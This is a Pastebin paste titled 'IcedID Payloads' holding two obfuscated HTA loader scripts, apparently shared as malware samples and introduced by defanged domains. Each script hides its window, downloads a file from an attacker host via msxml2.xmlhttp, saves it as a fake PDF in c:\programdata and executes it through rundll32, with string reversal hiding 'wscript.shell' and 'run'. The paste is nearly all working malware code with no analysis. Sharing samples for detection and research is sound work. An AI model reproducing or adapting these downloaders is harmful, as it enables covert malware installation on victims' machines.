API tools faq
paste
Advertisement
MalwareMessiagh

IcedID Payloads

MalwareMessiagh
Dec 15th, 2020
41,743
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.92 KB | None | 0 0
raw download clone embed print report
  1. Domain: ietbean7[.]com
  2. Payload:
  3. <script language="javascript">
  4. var aAS6q = "llehs.tpircsw".split("").reverse().join("")
  5. var a0buK = "nur".split("").reverse().join("")
  6. var aLSmEu = "r- AgolaiDwohS,".split("").reverse().join("")
  7. var aCHwi = "c:\\programdata\\az8mb9.pdf"
  8. window.resizeTo(1, 1)
  9. window.moveTo(-10, -10)
  10. var aHa9o = new ActiveXObject("msxml2.xmlhttp")
  11. aHa9o.open("GET", "http://ietbean7.com/forum/viewpost/2uqs7lQIL2TXCMcZczPrZW5inxcgdANIcjEBYi2041NiC_mdMMdu45dmf72SqtRqt5UEWEcfRUx2/axgqo13
  12. xXMom=WFPzfyAh
  13. FvDML=LGbECTvIkDlIBUVDg
  14. lwc=HFwpTQVZn
  15. xu=UtxPChmLkTtNka
  16. HQmE=ZcJwJHmsN_OPQes
  17. mob=JTWWjKfKhTX_CSH", false)
  18. aHa9o.send()
  19. </script>
  20. <script language="vbscript">
  21. a4HL6 = "rundll"
  22. If aHa9o.status = 200 Then
  23. Set asGPdJ = CreateObject("adodb.stream")
  24. asGPdJ.Open
  25. asGPdJ.Type = 1
  26. asGPdJ.Write aHa9o.responsebody
  27. asGPdJ.SaveToFile aCHwi, 2
  28. asGPdJ.Close
  29. End If
  30. var aFRkN = new ActiveXObject(aAS6q)[a0buK](a4HL6 + "32 " + aCHwi + aLSmEu)
  31. window.close()
  32.  
  33. Domain: ufjypdinosaur6[.]com
  34. Payload:
  35. <script language="javascript">
  36. var aCAxiZ = "llehs.tpircsw".split("").reverse().join("")
  37. var aihwT = "nur".split("").reverse().join("")
  38. var aFgxY = "r- AgolaiDwohS,".split("").reverse().join("")
  39. var abuGR = "c:\\programdata\\aqjN7n.pdf"
  40. window.resizeTo(1, 1)
  41. window.moveTo(-10, -10)
  42. var a2n3Mr = new ActiveXObject("msxml2.xmlhttp")
  43. a2n3Mr.open("GET", "http://ufjypdinosaur6.com/forum/viewpost/VQ0Lz2/yhEEsvp28Yv0YUhva_k3I0bWj9V6B5CwhCX1szzWDrXDiRSQYg4/80NrBppkEzitJnZVLWw2/axgqo1
  44. k_kFv=bvmUMvtfVSwataV
  45. SXDAL=durjpDcHwSbKt
  46. thl=ZebeGBBKEWZ
  47. RF=IVpMWTVMn
  48. ZWU=ImjMOFwhvwCJl", false)
  49. a2n3Mr.send()
  50. </script>
  51. <script language="vbscript">
  52. aoEc2 = "rundll"
  53. If a2n3Mr.status = 200 Then
  54. Set audkh = CreateObject("adodb.stream")
  55. audkh.Open
  56. audkh.Type = 1
  57. audkh.Write a2n3Mr.responsebody
  58. audkh.SaveToFile abuGR, 2
  59. audkh.Close
  60. End If
  61. var aD72c = new ActiveXObject(aCAxiZ)[aihwT](aoEc2 + "32 " + abuGR + aFgxY)
  62. window.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!